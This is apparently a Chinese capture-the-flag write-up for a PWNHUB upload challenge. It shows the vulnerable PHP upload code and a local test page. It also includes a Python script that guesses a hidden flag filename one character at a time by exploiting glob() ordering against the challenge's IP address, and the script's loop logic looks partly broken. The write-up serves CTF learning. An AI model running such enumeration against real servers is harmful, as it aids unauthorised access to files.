PWNHUB另一份文件
pwnhub___writeup
题目
http://54.223.145.113:88/
文件到底在哪里?我的文件又去了哪?
Flag是个文件,不需要shell,并且听说放文件的神秘人拥有服务器最高权限
其中的hint的代码是:
@move_uploaded_file($_FILES['file']['tmp_name'], $dir.$name);
echo "上传成功!\n\n文件内容:\n\n";
echo file_get_contents($dir.$name);
$files = glob($dir . '*');
@unlink($files[0]);
本地测试代码:
<!DOCTYPE html>
<html>
<head>
<title></title>
</head>
<body>
<form action="" method="POST" enctype="multipart/form-data">
<input type="file" value="" name="uploaded">
<input type="text" value="1" name="Upload">
<input type="submit" value="submit" name="submit">
</form>
</body>
</html>
<?php
$html = "";
if( isset( $_POST[ 'Upload' ] ) ) {
$target_path = "upload/";
$target_path .= $_FILES[ 'uploaded' ][ 'name' ];
if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
$html .= '<pre>Your image was not uploaded.</pre>';
}
else {
$html .= "<pre>succesfully uploaded!</pre>";
echo file_get_contents($target_path);
$dir = "upload/";
$files = glob($dir . '*');
var_dump($files);
@unlink($files[0]);
var_dump($_FILES);
}
}
?>
设置flag文件不可删除
chattr +i w333lc0met00pwnhu66
Get关键点是这个:
$files = glob($dir . '*');
@unlink($files[0]);
glob获取文件信息是按顺序排列的,如果目录中有一个文件存在的话,可以通过类似布尔盲注的思维来猜测。
python代码:
# coding:utf-8
import requests
url = "http://54.223.145.113:88/upload.php"
uploadurl = "http://54.223.145.113:88/upload/"
filename = "w333lc0met00pwnhu"
for i in "0123456789abcdefghijklmnopqrstuvwxyz":
filename += str(i)
file = {'file': (filename + ".txt", open('./1.txt', 'rb'))}
print filename
res = requests.post(url=url, files=file) # proxies={"http":"http://127.0.0.1:8080"})
# print res.content
if requests.get(url=uploadurl + filename + ".txt").status_code == 200:
tmp = filename[-1]
# print chr(ord(tmp)-1)
results = filename[0:-1] + chr(ord(tmp) - 1)
print "flag依次为: " + results
filename = results
break
filename= "w333lc0met00pwnhu"
浙公网安备 33010602011771号